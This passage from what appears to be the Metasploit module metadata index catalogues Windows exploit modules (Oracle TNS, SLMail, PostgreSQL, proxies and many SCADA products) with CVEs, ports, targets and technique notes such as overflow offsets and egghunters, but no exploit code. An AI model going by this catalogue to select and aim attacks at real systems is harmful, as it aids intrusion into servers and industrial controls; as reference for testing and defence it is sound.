"is_install_path": true,
"ref_name": "windows/oracle/tns_arguments",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/tns_auth_sesskey": {
"name": "Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",
"full_name": "exploit/windows/oracle/tns_auth_sesskey",
"rank": 500,
"disclosure_date": "2009-10-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long AUTH_SESSKEY value\n to the TNS service, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-1979",
"OSVDB-59110",
"BID-36747",
"URL-http://blogs.conus.info/node/28",
"URL-http://blogs.conus.info/node/35",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html"
],
"platform": "Windows",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Oracle 10.2.0.1.0 Enterprise Edition",
"Oracle 10.2.0.4.0 Enterprise Edition"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/tns_auth_sesskey.rb",
"is_install_path": true,
"ref_name": "windows/oracle/tns_auth_sesskey",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/tns_service_name": {
"name": "Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",
"full_name": "exploit/windows/oracle/tns_service_name",
"rank": 400,
"disclosure_date": "2002-05-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long SERVICE_NAME\n to the TNS service, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2002-0965",
"OSVDB-5041",
"BID-4845",
"URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle 8.1.7.0.0 Standard Edition (Windows 2000)",
"Oracle 8.1.7.0.0 Standard Edition (Windows 2003)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/tns_service_name.rb",
"is_install_path": true,
"ref_name": "windows/oracle/tns_service_name",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/pop3/seattlelab_pass": {
"name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow",
"full_name": "exploit/windows/pop3/seattlelab_pass",
"rank": 500,
"disclosure_date": "2003-05-07",
"type": "exploit",
"author": [
"stinko <vinnie@metasploit.com>"
],
"description": "There exists an unauthenticated buffer overflow vulnerability\n in the POP3 server of Seattle Lab Mail 5.5 when sending a password\n with excessive length.\n\n Successful exploitation should not crash either the\n service or the server; however, after initial use the\n port cannot be reused for successive exploitation until\n the service has been restarted. Consider using a command\n execution payload following the bind shell to restart\n the service if you need to reuse the same port.\n\n The overflow appears to occur in the debugging/error reporting\n section of the slmail.exe executable, and there are multiple\n offsets that will lead to successful exploitation. This exploit\n uses 2606, the offset that creates the smallest overall payload.\n The other offset is 4654.\n\n The return address is overwritten with a \"jmp esp\" call from the\n application library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n return address works against all versions of Windows and service packs.\n\n The last modification date on the library is dated 06/02/99. Assuming\n that the code where the overflow occurs has not changed in some time,\n prior versions of SLMail may also be vulnerable to this exploit. The\n author has not been able to acquire older versions of SLMail for\n testing purposes. Please let us know if you were able to get this\n exploit working against other SLMail versions.",
"references": [
"CVE-2003-0264",
"OSVDB-11975",
"BID-7519"
],
"platform": "Windows",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT/2000/XP/2003 (SLMail 5.5)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/pop3/seattlelab_pass.rb",
"is_install_path": true,
"ref_name": "windows/pop3/seattlelab_pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/postgres/postgres_payload": {
"name": "PostgreSQL for Microsoft Windows Payload Execution",
"full_name": "exploit/windows/postgres/postgres_payload",
"rank": 600,
"disclosure_date": "2009-04-10",
"type": "exploit",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>",
"todb <todb@metasploit.com>"
],
"description": "On default Microsoft Windows installations of PostgreSQL the postgres\n service account may write to the current directory (which is usually\n \"C:\\Program Files\\PostgreSQL\\<version>\\data\" where <version> is the\n major.minor version of PostgreSQL). UDF DLLs may be sourced from\n there as well.\n\n This module uploads a Windows DLL file via the pg_largeobject method\n of binary injection and creates a UDF (user defined function) from\n that DLL. Because the payload is run from DllMain, it does not need to\n conform to specific Postgres API versions.",
"references": [
"URL-http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql"
],
"platform": "Windows",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/postgres/postgres_payload.rb",
"is_install_path": true,
"ref_name": "windows/postgres/postgres_payload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/proxy/bluecoat_winproxy_host": {
"name": "Blue Coat WinProxy Host Header Overflow",
"full_name": "exploit/windows/proxy/bluecoat_winproxy_host",
"rank": 500,
"disclosure_date": "2005-01-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the Blue Coat Systems WinProxy\n service by sending a long port value for the Host header in an HTTP\n request.",
"references": [
"CVE-2005-4085",
"OSVDB-22238",
"BID-16147",
"URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinProxy <= 6.1 R1a Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb",
"is_install_path": true,
"ref_name": "windows/proxy/bluecoat_winproxy_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/proxy/ccproxy_telnet_ping": {
"name": "CCProxy Telnet Proxy Ping Overflow",
"full_name": "exploit/windows/proxy/ccproxy_telnet_ping",
"rank": 200,
"disclosure_date": "2004-11-11",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the YoungZSoft CCProxy <= v6.2 suite\n Telnet service. The stack is overwritten when sending an overly\n long address to the 'ping' command.",
"references": [
"CVE-2004-2416",
"OSVDB-11593",
"BID-11666",
"EDB-621"
],
"platform": "Windows",
"arch": "x86",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro All - English",
"Windows 2000 Pro All - Italian",
"Windows 2000 Pro All - French",
"Windows XP SP0/1 - English",
"Windows XP SP2 - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb",
"is_install_path": true,
"ref_name": "windows/proxy/ccproxy_telnet_ping",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/proxy/proxypro_http_get": {
"name": "Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",
"full_name": "exploit/windows/proxy/proxypro_http_get",
"rank": 500,
"disclosure_date": "2004-02-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Proxy-Pro Professional\n GateKeeper 4.7. By sending a long HTTP GET to the default port\n of 3128, a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2004-0326",
"OSVDB-4027",
"BID-9716"
],
"platform": "Windows",
"arch": "",
"rport": 3128,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Proxy-Pro GateKeeper 4.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/proxy/proxypro_http_get.rb",
"is_install_path": true,
"ref_name": "windows/proxy/proxypro_http_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/proxy/qbik_wingate_wwwproxy": {
"name": "Qbik WinGate WWW Proxy Server URL Processing Overflow",
"full_name": "exploit/windows/proxy/qbik_wingate_wwwproxy",
"rank": 400,
"disclosure_date": "2006-06-07",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Qbik WinGate version\n 6.1.1.1077 and earlier. By sending a malformed HTTP POST URL to the\n HTTP proxy service on port 80, a remote attacker could overflow\n a buffer and execute arbitrary code.",
"references": [
"CVE-2006-2926",
"OSVDB-26214",
"BID-18312"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinGate 6.1.1.1077"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb",
"is_install_path": true,
"ref_name": "windows/proxy/qbik_wingate_wwwproxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/abb_wserver_exec": {
"name": "ABB MicroSCADA wserver.exe Remote Code Execution",
"full_name": "exploit/windows/scada/abb_wserver_exec",
"rank": 600,
"disclosure_date": "2013-04-05",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The\n issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe\n component, which allows arbitrary commands. The component is disabled by default, but\n required when a project uses the SCIL function WORKSTATION_CALL.\n\n This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on\n Windows XP SP3 and Windows 7 SP1.",
"references": [
"OSVDB-100324",
"ZDI-13-270",
"URL-http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/41ccfa8ccd0431e6c1257c1200395574/$file/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf"
],
"platform": "Windows",
"arch": "x86",
"rport": 12221,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ABB MicroSCADA Pro SYS600 9.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/abb_wserver_exec.rb",
"is_install_path": true,
"ref_name": "windows/scada/abb_wserver_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/advantech_webaccess_dashboard_file_upload": {
"name": "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload",
"full_name": "exploit/windows/scada/advantech_webaccess_dashboard_file_upload",
"rank": 600,
"disclosure_date": "2016-02-05",
"type": "exploit",
"author": [
"rgod",
"Zhou Yu <504137480@qq.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.\n\n This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\n of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\n The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within\n the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to\n upload arbitrary code (instead of an image) to the server, which will then be executed under the\n high-privilege context of the IIS AppPool.",
"references": [
"CVE-2016-0854",
"ZDI-16-128",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Advantech WebAccess 8.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/scada/advantech_webaccess_dashboard_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/advantech_webaccess_webvrpcs_bof": {
"name": "Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow",
"full_name": "exploit/windows/scada/advantech_webaccess_webvrpcs_bof",
"rank": 400,
"disclosure_date": "2017-11-02",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>"
],
"description": "This module exploits a stack buffer overflow in Advantech WebAccess 8.2.\n By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"ZDI-17-938",
"CVE-2017-14016",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02"
],
"platform": "Windows",
"arch": "",
"rport": 4592,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31"
],
"mod_time": "2017-12-11 23:20:46 +0000",
"path": "/modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/advantech_webaccess_webvrpcs_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/citect_scada_odbc": {
"name": "CitectSCADA/CitectFacilities ODBC Buffer Overflow",
"full_name": "exploit/windows/scada/citect_scada_odbc",
"rank": 300,
"disclosure_date": "2008-06-11",
"type": "exploit",
"author": [
"KF <kf_lists@digitalmunition.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n This has only been tested against Citect v5, v6 and v7.",
"references": [
"CVE-2008-2639",
"BID-29634",
"OSVDB-46105",
"URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability",
"URL-http://www.auscert.org.au/render.html?it=9433",
"URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 20222,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Citect32.exe v5.21 NT4",
"Citect32.exe v5.21 2K/XP",
"Citect32.exe v5.41-r0 NT4",
"Citect32.exe v5.41-r0 2K/XP",
"Citect32.exe v6.0-r0 2K/XP",
"CiExceptionMailer.dll v5.42 on XP Sp2 or SP3",
"CiExceptionMailer.dll v6.0-r0 on Server 2003 Sp2",
"CiExceptionMailer.dll v6.0-r0 on XP Sp2 or SP3",
"CiExceptionMailer.dll v6.10 on XP Sp2 or SP3",
"CiExceptionMailer.dll v7.0-r0 on XP Sp2 or SP3",
"CiExceptionMailer.dll v7.0-r0 on 2003 Server SP1",
"CiExceptionMailer.dll v5.50-r0 XP SP2",
"CiExceptionMailer.dll v5.50-r0 2003 Server",
"Debug"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/scada/citect_scada_odbc.rb",
"is_install_path": true,
"ref_name": "windows/scada/citect_scada_odbc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/codesys_gateway_server_traversal": {
"name": "SCADA 3S CoDeSys Gateway Server Directory Traversal",
"full_name": "exploit/windows/scada/codesys_gateway_server_traversal",
"rank": 600,
"disclosure_date": "2013-02-02",
"type": "exploit",
"author": [
"Enrique Sanchez <esanchez@accuvant.com>"
],
"description": "This module exploits a directory traversal vulnerability that allows arbitrary\n file creation, which can be used to execute a mof file in order to gain remote\n execution within the SCADA system.",
"references": [
"CVE-2012-4705",
"OSVDB-90368",
"URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 1211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal S3 CoDeSyS < 2.3.9.27"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb",
"is_install_path": true,
"ref_name": "windows/scada/codesys_gateway_server_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/codesys_web_server": {
"name": "SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow",
"full_name": "exploit/windows/scada/codesys_web_server",
"rank": 300,
"disclosure_date": "2011-12-02",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Celil UNUVER",
"TecR0c <roccogiovannicalvi@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"Michael Coppola"
],
"description": "This module exploits a remote stack buffer overflow vulnerability in\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version\n 1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and\n earlier.",
"references": [
"CVE-2011-5007",
"OSVDB-77387",
"URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt",
"EDB-18187",
"URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-12-006-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"CoDeSys v2.3 on Windows XP SP3",
"CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/codesys_web_server.rb",
"is_install_path": true,
"ref_name": "windows/scada/codesys_web_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/daq_factory_bof": {
"name": "DaqFactory HMI NETB Request Overflow",
"full_name": "exploit/windows/scada/daq_factory_bof",
"rank": 400,
"disclosure_date": "2011-09-13",
"type": "exploit",
"author": [
"Luigi Auriemma",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in Azeotech's DaqFactory\n product. The specific vulnerability is triggered when sending a specially crafted\n 'NETB' request to port 20034. Exploitation of this vulnerability may take a few\n seconds due to the use of egghunter. This vulnerability was one of the 14\n releases discovered by researcher Luigi Auriemma.",
"references": [
"CVE-2011-3492",
"OSVDB-75496",
"URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-264-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 20034,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DAQFactory Pro 5.85 Build 1853 on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/daq_factory_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/daq_factory_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/delta_ia_commgr_bof": {
"name": "Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow",
"full_name": "exploit/windows/scada/delta_ia_commgr_bof",
"rank": 300,
"disclosure_date": "2018-07-02",
"type": "exploit",
"author": [
"ZDI",
"t4rkd3vilz",
"hubertwslin"
],
"description": "This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial\n Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially\n crafted packets. This module has been tested successfully on Delta Electronics Delta\n Industrial Automation COMMGR 1.08 over\n Windows XP SP3,\n Windows 7 SP1, and\n Windows 8.1.",
"references": [
"CVE-2018-10594",
"BID-104529",
"ZDI-18-586",
"ZDI-18-588",
"EDB-44965",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01"
],
"platform": "Windows",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"COMMGR 1.08 / Windows Universal"
],
"mod_time": "2018-10-08 14:15:21 +0000",
"path": "/modules/exploits/windows/scada/delta_ia_commgr_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/delta_ia_commgr_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/factorylink_csservice": {
"name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
"full_name": "exploit/windows/scada/factorylink_csservice",
"rank": 300,
"disclosure_date": "2011-03-25",
"type": "exploit",
"author": [
"Luigi Auriemma <aluigi@autistici.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found on Siemens FactoryLink 8. The\n vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n the user-supplied path first gets converted to ANSI format (CodePage 0), and then\n gets handled by a logging routine where proper bounds checking is not done,\n therefore causing a stack-based buffer overflow, and results in arbitrary code execution.",
"references": [
"OSVDB-72812",
"URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 7580,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3",
"Windows Server 2003 SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/factorylink_csservice.rb",
"is_install_path": true,
"ref_name": "windows/scada/factorylink_csservice",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/factorylink_vrn_09": {
"name": "Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow",
"full_name": "exploit/windows/scada/factorylink_vrn_09",
"rank": 200,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"hal",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n execute arbitrary code due to the improper use of a vsprintf() function while\n processing the user-supplied text field. Originally found and posted by\n Luigi Auriemma.",
"references": [
"OSVDB-72815",
"URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 7579,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"FactoryLink 7.5",
"FactoryLink 7.5 SP2",
"FactoryLink 8.0.1.703"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/factorylink_vrn_09.rb",
"is_install_path": true,
"ref_name": "windows/scada/factorylink_vrn_09",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/ge_proficy_cimplicity_gefebt": {
"name": "GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",
"full_name": "exploit/windows/scada/ge_proficy_cimplicity_gefebt",
"rank": 600,
"disclosure_date": "2014-01-23",
"type": "exploit",
"author": [
"amisto0x07",
"Z0mb1E",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the\n CIMPLICITY CimWebServer. The vulnerable component allows execution of remote BCL files in\n shared resources. An attacker can abuse this behavior to execute a malicious BCL and\n drop an arbitrary EXE. The last one can be executed remotely through the WebView server.\n This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded\n CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If\n the target does not have the WebClient service enabled, an external SMB service is necessary.",
"references": [
"CVE-2014-0750",
"ZDI-14-015",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb",
"is_install_path": true,
"ref_name": "windows/scada/ge_proficy_cimplicity_gefebt",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/iconics_genbroker": {
"name": "Iconics GENESIS32 Integer Overflow Version 9.21.201.01",
"full_name": "exploit/windows/scada/iconics_genbroker",
"rank": 400,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Lincoln",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "The GenBroker service on port 38080 is affected by three integer overflow\n vulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n memory allocations needed for the number of elements passed by the client.\n This results in unexpected behaviors such as direct registry calls, memory location\n calls, or arbitrary remote code execution. Please note that in order to ensure\n reliability, this exploit will try to open calc (hidden), inject itself into the\n process, and then open up a shell session. Also, DEP bypass is supported.",
"references": [
"OSVDB-72817",
"URL-http://aluigi.org/adv/genesis_4-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 38080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/iconics_genbroker.rb",
"is_install_path": true,
"ref_name": "windows/scada/iconics_genbroker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/iconics_webhmi_setactivexguid": {
"name": "ICONICS WebHMI ActiveX Buffer Overflow",
"full_name": "exploit/windows/scada/iconics_webhmi_setactivexguid",
"rank": 400,
"disclosure_date": "2011-05-05",
"type": "exploit",
"author": [
"Scoot Bell <scott.bell@security-assessment.com>",
"Blair Strang <blair.strang@security-assessment.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n fails to do any proper bounds checking before this input is copied onto the stack,\n which causes a buffer overflow, and results in arbitrary code execution under the context\n of the user.",
"references": [
"CVE-2011-2089",
"OSVDB-72135",
"URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf",
"EDB-17240",
"URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6/7/8 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb",
"is_install_path": true,
"ref_name": "windows/scada/iconics_webhmi_setactivexguid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss9_igssdataserver_listall": {
"name": "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow",
"full_name": "exploit/windows/scada/igss9_igssdataserver_listall",
"rank": 400,
"disclosure_date": "2011-03-24",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Lincoln",
"corelanc0d3r <peter.ve@corelan.be>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows overwriting a structured exception handling record\n on the stack, allowing for unauthenticated remote code execution. Also, after the payload\n exits, IGSSdataServer.exe should automatically recover.",
"references": [
"CVE-2011-1567",
"OSVDB-72353",
"URL-http://aluigi.altervista.org/adv/igss_2-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 12401,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss9_igssdataserver_listall",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss9_igssdataserver_rename": {
"name": "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",
"full_name": "exploit/windows/scada/igss9_igssdataserver_rename",
"rank": 300,
"disclosure_date": "2011-03-24",
"type": "exploit",
"author": [
"Luigi Auriemma <aluigi@autistici.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n a buffer overflow condition occurs in IGSSdataServer.exe while handling an RMS report,\n which results in arbitrary code execution under the context of the user.\n\n The attack is carried out in three stages. The first stage sends the final payload to\n IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n so the process can find a valid ID for the Rename command. The last stage then triggers\n the vulnerability with the Rename command, and uses an egghunter to search for the\n shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n the small buffer size, which cannot even contain our ROP chain and the final payload.",
"references": [
"CVE-2011-1567",
"OSVDB-72352",
"URL-http://aluigi.altervista.org/adv/igss_5-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 12401,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3",
"Windows Server 2003 SP2/R2 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss9_igssdataserver_rename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss9_misc": {
